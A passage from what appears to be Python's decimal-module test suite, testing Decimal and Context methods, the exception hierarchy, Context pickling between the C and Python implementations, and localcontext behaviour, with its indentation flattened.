self.assertEqual(x.conjugate(), x)
x = Decimal("1")
self.assertEqual(complex(x), complex(float(1)))
self.assertRaises(AttributeError, setattr, x, 'real', 100)
self.assertRaises(AttributeError, setattr, x, 'imag', 100)
self.assertRaises(AttributeError, setattr, x, 'conjugate', 100)
self.assertRaises(AttributeError, setattr, x, '__complex__', 100)
def test_named_parameters(self):
D = self.decimal.Decimal
Context = self.decimal.Context
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
Overflow = self.decimal.Overflow
xc = Context()
xc.prec = 1
xc.Emax = 1
xc.Emin = -1
with localcontext() as c:
c.clear_flags()
self.assertEqual(D(9, xc), 9)
self.assertEqual(D(9, context=xc), 9)
self.assertEqual(D(context=xc, value=9), 9)
self.assertEqual(D(context=xc), 0)
xc.clear_flags()
self.assertRaises(InvalidOperation, D, "xyz", context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
xc.clear_flags()
self.assertEqual(D(2).exp(context=xc), 7)
self.assertRaises(Overflow, D(8).exp, context=xc)
self.assertTrue(xc.flags[Overflow])
self.assertFalse(c.flags[Overflow])
xc.clear_flags()
self.assertEqual(D(2).ln(context=xc), D('0.7'))
self.assertRaises(InvalidOperation, D(-1).ln, context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
self.assertEqual(D(0).log10(context=xc), D('-inf'))
self.assertEqual(D(-1).next_minus(context=xc), -2)
self.assertEqual(D(-1).next_plus(context=xc), D('-0.9'))
self.assertEqual(D("9.73").normalize(context=xc), D('1E+1'))
self.assertEqual(D("9999").to_integral(context=xc), 9999)
self.assertEqual(D("-2000").to_integral_exact(context=xc), -2000)
self.assertEqual(D("123").to_integral_value(context=xc), 123)
self.assertEqual(D("0.0625").sqrt(context=xc), D('0.2'))
self.assertEqual(D("0.0625").compare(context=xc, other=3), -1)
xc.clear_flags()
self.assertRaises(InvalidOperation,
D("0").compare_signal, D('nan'), context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
self.assertEqual(D("0.01").max(D('0.0101'), context=xc), D('0.0'))
self.assertEqual(D("0.01").max(D('0.0101'), context=xc), D('0.0'))
self.assertEqual(D("0.2").max_mag(D('-0.3'), context=xc),
D('-0.3'))
self.assertEqual(D("0.02").min(D('-0.03'), context=xc), D('-0.0'))
self.assertEqual(D("0.02").min_mag(D('-0.03'), context=xc),
D('0.0'))
self.assertEqual(D("0.2").next_toward(D('-1'), context=xc), D('0.1'))
xc.clear_flags()
self.assertRaises(InvalidOperation,
D("0.2").quantize, D('1e10'), context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
self.assertEqual(D("9.99").remainder_near(D('1.5'), context=xc),
D('-0.5'))
self.assertEqual(D("9.9").fma(third=D('0.9'), context=xc, other=7),
D('7E+1'))
self.assertRaises(TypeError, D(1).is_canonical, context=xc)
self.assertRaises(TypeError, D(1).is_finite, context=xc)
self.assertRaises(TypeError, D(1).is_infinite, context=xc)
self.assertRaises(TypeError, D(1).is_nan, context=xc)
self.assertRaises(TypeError, D(1).is_qnan, context=xc)
self.assertRaises(TypeError, D(1).is_snan, context=xc)
self.assertRaises(TypeError, D(1).is_signed, context=xc)
self.assertRaises(TypeError, D(1).is_zero, context=xc)
self.assertFalse(D("0.01").is_normal(context=xc))
self.assertTrue(D("0.01").is_subnormal(context=xc))
self.assertRaises(TypeError, D(1).adjusted, context=xc)
self.assertRaises(TypeError, D(1).conjugate, context=xc)
self.assertRaises(TypeError, D(1).radix, context=xc)
self.assertEqual(D(-111).logb(context=xc), 2)
self.assertEqual(D(0).logical_invert(context=xc), 1)
self.assertEqual(D('0.01').number_class(context=xc), '+Subnormal')
self.assertEqual(D('0.21').to_eng_string(context=xc), '0.21')
self.assertEqual(D('11').logical_and(D('10'), context=xc), 0)
self.assertEqual(D('11').logical_or(D('10'), context=xc), 1)
self.assertEqual(D('01').logical_xor(D('10'), context=xc), 1)
self.assertEqual(D('23').rotate(1, context=xc), 3)
self.assertEqual(D('23').rotate(1, context=xc), 3)
xc.clear_flags()
self.assertRaises(Overflow,
D('23').scaleb, 1, context=xc)
self.assertTrue(xc.flags[Overflow])
self.assertFalse(c.flags[Overflow])
self.assertEqual(D('23').shift(-1, context=xc), 0)
self.assertRaises(TypeError, D.from_float, 1.1, context=xc)
self.assertRaises(TypeError, D(0).as_tuple, context=xc)
self.assertEqual(D(1).canonical(), 1)
self.assertRaises(TypeError, D("-1").copy_abs, context=xc)
self.assertRaises(TypeError, D("-1").copy_negate, context=xc)
self.assertRaises(TypeError, D(1).canonical, context="x")
self.assertRaises(TypeError, D(1).canonical, xyz="x")
def test_exception_hierarchy(self):
decimal = self.decimal
DecimalException = decimal.DecimalException
InvalidOperation = decimal.InvalidOperation
FloatOperation = decimal.FloatOperation
DivisionByZero = decimal.DivisionByZero
Overflow = decimal.Overflow
Underflow = decimal.Underflow
Subnormal = decimal.Subnormal
Inexact = decimal.Inexact
Rounded = decimal.Rounded
Clamped = decimal.Clamped
self.assertTrue(issubclass(DecimalException, ArithmeticError))
self.assertTrue(issubclass(InvalidOperation, DecimalException))
self.assertTrue(issubclass(FloatOperation, DecimalException))
self.assertTrue(issubclass(FloatOperation, TypeError))
self.assertTrue(issubclass(DivisionByZero, DecimalException))
self.assertTrue(issubclass(DivisionByZero, ZeroDivisionError))
self.assertTrue(issubclass(Overflow, Rounded))
self.assertTrue(issubclass(Overflow, Inexact))
self.assertTrue(issubclass(Overflow, DecimalException))
self.assertTrue(issubclass(Underflow, Inexact))
self.assertTrue(issubclass(Underflow, Rounded))
self.assertTrue(issubclass(Underflow, Subnormal))
self.assertTrue(issubclass(Underflow, DecimalException))
self.assertTrue(issubclass(Subnormal, DecimalException))
self.assertTrue(issubclass(Inexact, DecimalException))
self.assertTrue(issubclass(Rounded, DecimalException))
self.assertTrue(issubclass(Clamped, DecimalException))
self.assertTrue(issubclass(decimal.ConversionSyntax, InvalidOperation))
self.assertTrue(issubclass(decimal.DivisionImpossible, InvalidOperation))
self.assertTrue(issubclass(decimal.DivisionUndefined, InvalidOperation))
self.assertTrue(issubclass(decimal.DivisionUndefined, ZeroDivisionError))
self.assertTrue(issubclass(decimal.InvalidContext, InvalidOperation))
class CPythonAPItests(PythonAPItests):
decimal = C
class PyPythonAPItests(PythonAPItests):
decimal = P
class ContextAPItests(unittest.TestCase):
def test_none_args(self):
Context = self.decimal.Context
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
c1 = Context()
c2 = Context(prec=None, rounding=None, Emax=None, Emin=None,
capitals=None, clamp=None, flags=None, traps=None)
for c in [c1, c2]:
self.assertEqual(c.prec, 28)
self.assertEqual(c.rounding, ROUND_HALF_EVEN)
self.assertEqual(c.Emax, 999999)
self.assertEqual(c.Emin, -999999)
self.assertEqual(c.capitals, 1)
self.assertEqual(c.clamp, 0)
assert_signals(self, c, 'flags', [])
assert_signals(self, c, 'traps', [InvalidOperation, DivisionByZero,
Overflow])
@cpython_only
def test_from_legacy_strings(self):
import _testcapi
c = self.decimal.Context()
for rnd in RoundingModes:
c.rounding = _testcapi.unicode_legacy_string(rnd)
self.assertEqual(c.rounding, rnd)
s = _testcapi.unicode_legacy_string('')
self.assertRaises(TypeError, setattr, c, 'rounding', s)
s = _testcapi.unicode_legacy_string('ROUND_\x00UP')
self.assertRaises(TypeError, setattr, c, 'rounding', s)
def test_pickle(self):
Context = self.decimal.Context
savedecimal = sys.modules['decimal']
# Round trip
sys.modules['decimal'] = self.decimal
c = Context()
e = pickle.loads(pickle.dumps(c))
self.assertEqual(c.prec, e.prec)
self.assertEqual(c.Emin, e.Emin)
self.assertEqual(c.Emax, e.Emax)
self.assertEqual(c.rounding, e.rounding)
self.assertEqual(c.capitals, e.capitals)
self.assertEqual(c.clamp, e.clamp)
self.assertEqual(c.flags, e.flags)
self.assertEqual(c.traps, e.traps)
# Test interchangeability
combinations = [(C, P), (P, C)] if C else [(P, P)]
for dumper, loader in combinations:
for ri, _ in enumerate(RoundingModes):
for fi, _ in enumerate(OrderedSignals[dumper]):
for ti, _ in enumerate(OrderedSignals[dumper]):
prec = random.randrange(1, 100)
emin = random.randrange(-100, 0)
emax = random.randrange(1, 100)
caps = random.randrange(2)
clamp = random.randrange(2)
# One module dumps
sys.modules['decimal'] = dumper
c = dumper.Context(
prec=prec, Emin=emin, Emax=emax,
rounding=RoundingModes[ri],
capitals=caps, clamp=clamp,
flags=OrderedSignals[dumper][:fi],
traps=OrderedSignals[dumper][:ti]
)
s = pickle.dumps(c)
# The other module loads
sys.modules['decimal'] = loader
d = pickle.loads(s)
self.assertIsInstance(d, loader.Context)
self.assertEqual(d.prec, prec)
self.assertEqual(d.Emin, emin)
self.assertEqual(d.Emax, emax)
self.assertEqual(d.rounding, RoundingModes[ri])
self.assertEqual(d.capitals, caps)
self.assertEqual(d.clamp, clamp)
assert_signals(self, d, 'flags', OrderedSignals[loader][:fi])
assert_signals(self, d, 'traps', OrderedSignals[loader][:ti])
sys.modules['decimal'] = savedecimal
def test_equality_with_other_types(self):
Decimal = self.decimal.Decimal
self.assertIn(Decimal(10), ['a', 1.0, Decimal(10), (1,2), {}])
self.assertNotIn(Decimal(10), ['a', 1.0, (1,2), {}])
def test_copy(self):
# All copies should be deep
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy()
self.assertNotEqual(id(c), id(d))
self.assertNotEqual(id(c.flags), id(d.flags))
self.assertNotEqual(id(c.traps), id(d.traps))
k1 = set(c.flags.keys())
k2 = set(d.flags.keys())
self.assertEqual(k1, k2)
self.assertEqual(c.flags, d.flags)
def test__clamp(self):
# In Python 3.2, the private attribute `_clamp` was made
# public (issue 8540), with the old `_clamp` becoming a
# property wrapping `clamp`. For the duration of Python 3.2
# only, the attribute should be gettable/settable via both
# `clamp` and `_clamp`; in Python 3.3, `_clamp` should be
# removed.
Context = self.decimal.Context
c = Context()
self.assertRaises(AttributeError, getattr, c, '_clamp')
def test_abs(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.abs(Decimal(-1))
self.assertEqual(c.abs(-1), d)
self.assertRaises(TypeError, c.abs, '-1')
def test_add(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.add(Decimal(1), Decimal(1))
self.assertEqual(c.add(1, 1), d)
self.assertEqual(c.add(Decimal(1), 1), d)
self.assertEqual(c.add(1, Decimal(1)), d)
self.assertRaises(TypeError, c.add, '1', 1)
self.assertRaises(TypeError, c.add, 1, '1')
def test_compare(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare(Decimal(1), Decimal(1))
self.assertEqual(c.compare(1, 1), d)
self.assertEqual(c.compare(Decimal(1), 1), d)
self.assertEqual(c.compare(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare, '1', 1)
self.assertRaises(TypeError, c.compare, 1, '1')
def test_compare_signal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare_signal(Decimal(1), Decimal(1))
self.assertEqual(c.compare_signal(1, 1), d)
self.assertEqual(c.compare_signal(Decimal(1), 1), d)
self.assertEqual(c.compare_signal(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare_signal, '1', 1)
self.assertRaises(TypeError, c.compare_signal, 1, '1')
def test_compare_total(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare_total(Decimal(1), Decimal(1))
self.assertEqual(c.compare_total(1, 1), d)
self.assertEqual(c.compare_total(Decimal(1), 1), d)
self.assertEqual(c.compare_total(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare_total, '1', 1)
self.assertRaises(TypeError, c.compare_total, 1, '1')
def test_compare_total_mag(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare_total_mag(Decimal(1), Decimal(1))
self.assertEqual(c.compare_total_mag(1, 1), d)
self.assertEqual(c.compare_total_mag(Decimal(1), 1), d)
self.assertEqual(c.compare_total_mag(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare_total_mag, '1', 1)
self.assertRaises(TypeError, c.compare_total_mag, 1, '1')
def test_copy_abs(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_abs(Decimal(-1))
self.assertEqual(c.copy_abs(-1), d)
self.assertRaises(TypeError, c.copy_abs, '-1')
def test_copy_decimal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_decimal(Decimal(-1))
self.assertEqual(c.copy_decimal(-1), d)
self.assertRaises(TypeError, c.copy_decimal, '-1')
def test_copy_negate(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_negate(Decimal(-1))
self.assertEqual(c.copy_negate(-1), d)
self.assertRaises(TypeError, c.copy_negate, '-1')
def test_copy_sign(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_sign(Decimal(1), Decimal(-2))
self.assertEqual(c.copy_sign(1, -2), d)
self.assertEqual(c.copy_sign(Decimal(1), -2), d)
self.assertEqual(c.copy_sign(1, Decimal(-2)), d)
self.assertRaises(TypeError, c.copy_sign, '1', -2)
self.assertRaises(TypeError, c.copy_sign, 1, '-2')
def test_divide(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.divide(Decimal(1), Decimal(2))
self.assertEqual(c.divide(1, 2), d)
self.assertEqual(c.divide(Decimal(1), 2), d)
self.assertEqual(c.divide(1, Decimal(2)), d)
self.assertRaises(TypeError, c.divide, '1', 2)
self.assertRaises(TypeError, c.divide, 1, '2')
def test_divide_int(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.divide_int(Decimal(1), Decimal(2))
self.assertEqual(c.divide_int(1, 2), d)
self.assertEqual(c.divide_int(Decimal(1), 2), d)
self.assertEqual(c.divide_int(1, Decimal(2)), d)
self.assertRaises(TypeError, c.divide_int, '1', 2)
self.assertRaises(TypeError, c.divide_int, 1, '2')
def test_divmod(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.divmod(Decimal(1), Decimal(2))
self.assertEqual(c.divmod(1, 2), d)
self.assertEqual(c.divmod(Decimal(1), 2), d)
self.assertEqual(c.divmod(1, Decimal(2)), d)
self.assertRaises(TypeError, c.divmod, '1', 2)
self.assertRaises(TypeError, c.divmod, 1, '2')
def test_exp(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.exp(Decimal(10))
self.assertEqual(c.exp(10), d)
self.assertRaises(TypeError, c.exp, '10')
def test_fma(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.fma(Decimal(2), Decimal(3), Decimal(4))
self.assertEqual(c.fma(2, 3, 4), d)
self.assertEqual(c.fma(Decimal(2), 3, 4), d)
self.assertEqual(c.fma(2, Decimal(3), 4), d)
self.assertEqual(c.fma(2, 3, Decimal(4)), d)
self.assertEqual(c.fma(Decimal(2), Decimal(3), 4), d)
self.assertRaises(TypeError, c.fma, '2', 3, 4)
self.assertRaises(TypeError, c.fma, 2, '3', 4)
self.assertRaises(TypeError, c.fma, 2, 3, '4')
# Issue 12079 for Context.fma ...
self.assertRaises(TypeError, c.fma,
Decimal('Infinity'), Decimal(0), "not a decimal")
self.assertRaises(TypeError, c.fma,
Decimal(1), Decimal('snan'), 1.222)
# ... and for Decimal.fma.
self.assertRaises(TypeError, Decimal('Infinity').fma,
Decimal(0), "not a decimal")
self.assertRaises(TypeError, Decimal(1).fma,
Decimal('snan'), 1.222)
def test_is_finite(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_finite(Decimal(10))
self.assertEqual(c.is_finite(10), d)
self.assertRaises(TypeError, c.is_finite, '10')
def test_is_infinite(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_infinite(Decimal(10))
self.assertEqual(c.is_infinite(10), d)
self.assertRaises(TypeError, c.is_infinite, '10')
def test_is_nan(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_nan(Decimal(10))
self.assertEqual(c.is_nan(10), d)
self.assertRaises(TypeError, c.is_nan, '10')
def test_is_normal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_normal(Decimal(10))
self.assertEqual(c.is_normal(10), d)
self.assertRaises(TypeError, c.is_normal, '10')
def test_is_qnan(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_qnan(Decimal(10))
self.assertEqual(c.is_qnan(10), d)
self.assertRaises(TypeError, c.is_qnan, '10')
def test_is_signed(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_signed(Decimal(10))
self.assertEqual(c.is_signed(10), d)
self.assertRaises(TypeError, c.is_signed, '10')
def test_is_snan(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_snan(Decimal(10))
self.assertEqual(c.is_snan(10), d)
self.assertRaises(TypeError, c.is_snan, '10')
def test_is_subnormal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_subnormal(Decimal(10))
self.assertEqual(c.is_subnormal(10), d)
self.assertRaises(TypeError, c.is_subnormal, '10')
def test_is_zero(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_zero(Decimal(10))
self.assertEqual(c.is_zero(10), d)
self.assertRaises(TypeError, c.is_zero, '10')
def test_ln(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.ln(Decimal(10))
self.assertEqual(c.ln(10), d)
self.assertRaises(TypeError, c.ln, '10')
def test_log10(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.log10(Decimal(10))
self.assertEqual(c.log10(10), d)
self.assertRaises(TypeError, c.log10, '10')
def test_logb(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logb(Decimal(10))
self.assertEqual(c.logb(10), d)
self.assertRaises(TypeError, c.logb, '10')
def test_logical_and(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_and(Decimal(1), Decimal(1))
self.assertEqual(c.logical_and(1, 1), d)
self.assertEqual(c.logical_and(Decimal(1), 1), d)
self.assertEqual(c.logical_and(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_and, '1', 1)
self.assertRaises(TypeError, c.logical_and, 1, '1')
def test_logical_invert(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_invert(Decimal(1000))
self.assertEqual(c.logical_invert(1000), d)
self.assertRaises(TypeError, c.logical_invert, '1000')
def test_logical_or(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_or(Decimal(1), Decimal(1))
self.assertEqual(c.logical_or(1, 1), d)
self.assertEqual(c.logical_or(Decimal(1), 1), d)
self.assertEqual(c.logical_or(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_or, '1', 1)
self.assertRaises(TypeError, c.logical_or, 1, '1')
def test_logical_xor(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_xor(Decimal(1), Decimal(1))
self.assertEqual(c.logical_xor(1, 1), d)
self.assertEqual(c.logical_xor(Decimal(1), 1), d)
self.assertEqual(c.logical_xor(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_xor, '1', 1)
self.assertRaises(TypeError, c.logical_xor, 1, '1')
def test_max(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.max(Decimal(1), Decimal(2))
self.assertEqual(c.max(1, 2), d)
self.assertEqual(c.max(Decimal(1), 2), d)
self.assertEqual(c.max(1, Decimal(2)), d)
self.assertRaises(TypeError, c.max, '1', 2)
self.assertRaises(TypeError, c.max, 1, '2')
def test_max_mag(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.max_mag(Decimal(1), Decimal(2))
self.assertEqual(c.max_mag(1, 2), d)
self.assertEqual(c.max_mag(Decimal(1), 2), d)
self.assertEqual(c.max_mag(1, Decimal(2)), d)
self.assertRaises(TypeError, c.max_mag, '1', 2)
self.assertRaises(TypeError, c.max_mag, 1, '2')
def test_min(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.min(Decimal(1), Decimal(2))
self.assertEqual(c.min(1, 2), d)
self.assertEqual(c.min(Decimal(1), 2), d)
self.assertEqual(c.min(1, Decimal(2)), d)
self.assertRaises(TypeError, c.min, '1', 2)
self.assertRaises(TypeError, c.min, 1, '2')
def test_min_mag(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.min_mag(Decimal(1), Decimal(2))
self.assertEqual(c.min_mag(1, 2), d)
self.assertEqual(c.min_mag(Decimal(1), 2), d)
self.assertEqual(c.min_mag(1, Decimal(2)), d)
self.assertRaises(TypeError, c.min_mag, '1', 2)
self.assertRaises(TypeError, c.min_mag, 1, '2')
def test_minus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.minus(Decimal(10))
self.assertEqual(c.minus(10), d)
self.assertRaises(TypeError, c.minus, '10')
def test_multiply(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.multiply(Decimal(1), Decimal(2))
self.assertEqual(c.multiply(1, 2), d)
self.assertEqual(c.multiply(Decimal(1), 2), d)
self.assertEqual(c.multiply(1, Decimal(2)), d)
self.assertRaises(TypeError, c.multiply, '1', 2)
self.assertRaises(TypeError, c.multiply, 1, '2')
def test_next_minus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_minus(Decimal(10))
self.assertEqual(c.next_minus(10), d)
self.assertRaises(TypeError, c.next_minus, '10')
def test_next_plus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_plus(Decimal(10))
self.assertEqual(c.next_plus(10), d)
self.assertRaises(TypeError, c.next_plus, '10')
def test_next_toward(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_toward(Decimal(1), Decimal(2))
self.assertEqual(c.next_toward(1, 2), d)
self.assertEqual(c.next_toward(Decimal(1), 2), d)
self.assertEqual(c.next_toward(1, Decimal(2)), d)
self.assertRaises(TypeError, c.next_toward, '1', 2)
self.assertRaises(TypeError, c.next_toward, 1, '2')
def test_normalize(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.normalize(Decimal(10))
self.assertEqual(c.normalize(10), d)
self.assertRaises(TypeError, c.normalize, '10')
def test_number_class(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
self.assertEqual(c.number_class(123), c.number_class(Decimal(123)))
self.assertEqual(c.number_class(0), c.number_class(Decimal(0)))
self.assertEqual(c.number_class(-45), c.number_class(Decimal(-45)))
def test_plus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.plus(Decimal(10))
self.assertEqual(c.plus(10), d)
self.assertRaises(TypeError, c.plus, '10')
def test_power(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.power(Decimal(1), Decimal(4))
self.assertEqual(c.power(1, 4), d)
self.assertEqual(c.power(Decimal(1), 4), d)
self.assertEqual(c.power(1, Decimal(4)), d)
self.assertEqual(c.power(Decimal(1), Decimal(4)), d)
self.assertRaises(TypeError, c.power, '1', 4)
self.assertRaises(TypeError, c.power, 1, '4')
self.assertEqual(c.power(modulo=5, b=8, a=2), 1)
def test_quantize(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.quantize(Decimal(1), Decimal(2))
self.assertEqual(c.quantize(1, 2), d)
self.assertEqual(c.quantize(Decimal(1), 2), d)
self.assertEqual(c.quantize(1, Decimal(2)), d)
self.assertRaises(TypeError, c.quantize, '1', 2)
self.assertRaises(TypeError, c.quantize, 1, '2')
def test_remainder(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.remainder(Decimal(1), Decimal(2))
self.assertEqual(c.remainder(1, 2), d)
self.assertEqual(c.remainder(Decimal(1), 2), d)
self.assertEqual(c.remainder(1, Decimal(2)), d)
self.assertRaises(TypeError, c.remainder, '1', 2)
self.assertRaises(TypeError, c.remainder, 1, '2')
def test_remainder_near(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.remainder_near(Decimal(1), Decimal(2))
self.assertEqual(c.remainder_near(1, 2), d)
self.assertEqual(c.remainder_near(Decimal(1), 2), d)
self.assertEqual(c.remainder_near(1, Decimal(2)), d)
self.assertRaises(TypeError, c.remainder_near, '1', 2)
self.assertRaises(TypeError, c.remainder_near, 1, '2')
def test_rotate(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.rotate(Decimal(1), Decimal(2))
self.assertEqual(c.rotate(1, 2), d)
self.assertEqual(c.rotate(Decimal(1), 2), d)
self.assertEqual(c.rotate(1, Decimal(2)), d)
self.assertRaises(TypeError, c.rotate, '1', 2)
self.assertRaises(TypeError, c.rotate, 1, '2')
def test_sqrt(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.sqrt(Decimal(10))
self.assertEqual(c.sqrt(10), d)
self.assertRaises(TypeError, c.sqrt, '10')
def test_same_quantum(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.same_quantum(Decimal(1), Decimal(2))
self.assertEqual(c.same_quantum(1, 2), d)
self.assertEqual(c.same_quantum(Decimal(1), 2), d)
self.assertEqual(c.same_quantum(1, Decimal(2)), d)
self.assertRaises(TypeError, c.same_quantum, '1', 2)
self.assertRaises(TypeError, c.same_quantum, 1, '2')
def test_scaleb(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.scaleb(Decimal(1), Decimal(2))
self.assertEqual(c.scaleb(1, 2), d)
self.assertEqual(c.scaleb(Decimal(1), 2), d)
self.assertEqual(c.scaleb(1, Decimal(2)), d)
self.assertRaises(TypeError, c.scaleb, '1', 2)
self.assertRaises(TypeError, c.scaleb, 1, '2')
def test_shift(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.shift(Decimal(1), Decimal(2))
self.assertEqual(c.shift(1, 2), d)
self.assertEqual(c.shift(Decimal(1), 2), d)
self.assertEqual(c.shift(1, Decimal(2)), d)
self.assertRaises(TypeError, c.shift, '1', 2)
self.assertRaises(TypeError, c.shift, 1, '2')
def test_subtract(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.subtract(Decimal(1), Decimal(2))
self.assertEqual(c.subtract(1, 2), d)
self.assertEqual(c.subtract(Decimal(1), 2), d)
self.assertEqual(c.subtract(1, Decimal(2)), d)
self.assertRaises(TypeError, c.subtract, '1', 2)
self.assertRaises(TypeError, c.subtract, 1, '2')
def test_to_eng_string(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_eng_string(Decimal(10))
self.assertEqual(c.to_eng_string(10), d)
self.assertRaises(TypeError, c.to_eng_string, '10')
def test_to_sci_string(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_sci_string(Decimal(10))
self.assertEqual(c.to_sci_string(10), d)
self.assertRaises(TypeError, c.to_sci_string, '10')
def test_to_integral_exact(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_integral_exact(Decimal(10))
self.assertEqual(c.to_integral_exact(10), d)
self.assertRaises(TypeError, c.to_integral_exact, '10')
def test_to_integral_value(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_integral_value(Decimal(10))
self.assertEqual(c.to_integral_value(10), d)
self.assertRaises(TypeError, c.to_integral_value, '10')
self.assertRaises(TypeError, c.to_integral_value, 10, 'x')
class CContextAPItests(ContextAPItests):
decimal = C
class PyContextAPItests(ContextAPItests):
decimal = P
class ContextWithStatement(unittest.TestCase):
# Can't do these as docstrings until Python 2.6
# as doctest can't handle __future__ statements
def test_localcontext(self):
# Use a copy of the current context in the block
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
orig_ctx = getcontext()
with localcontext() as enter_ctx:
set_ctx = getcontext()
final_ctx = getcontext()
self.assertIs(orig_ctx, final_ctx, 'did not restore context correctly')
self.assertIsNot(orig_ctx, set_ctx, 'did not copy the context')
self.assertIs(set_ctx, enter_ctx, '__enter__ returned wrong context')
def test_localcontextarg(self):
# Use a copy of the supplied context in the block
Context = self.decimal.Context
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
localcontext = self.decimal.localcontext
orig_ctx = getcontext()
new_ctx = Context(prec=42)
with localcontext(new_ctx) as enter_ctx:
set_ctx = getcontext()
final_ctx = getcontext()
self.assertIs(orig_ctx, final_ctx, 'did not restore context correctly')
self.assertEqual(set_ctx.prec, new_ctx.prec, 'did not set correct context')
self.assertIsNot(new_ctx, set_ctx, 'did not copy the context')
self.assertIs(set_ctx, enter_ctx, '__enter__ returned wrong context')
def test_nested_with_statements(self):
# Use a copy of the supplied context in the block
Decimal = self.decimal.Decimal
Context = self.decimal.Context
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
Clamped = self.decimal.Clamped
Overflow = self.decimal.Overflow
orig_ctx = getcontext()
orig_ctx.clear_flags()
new_ctx = Context(Emax=384)
with localcontext() as c1:
self.assertEqual(c1.flags, orig_ctx.flags)
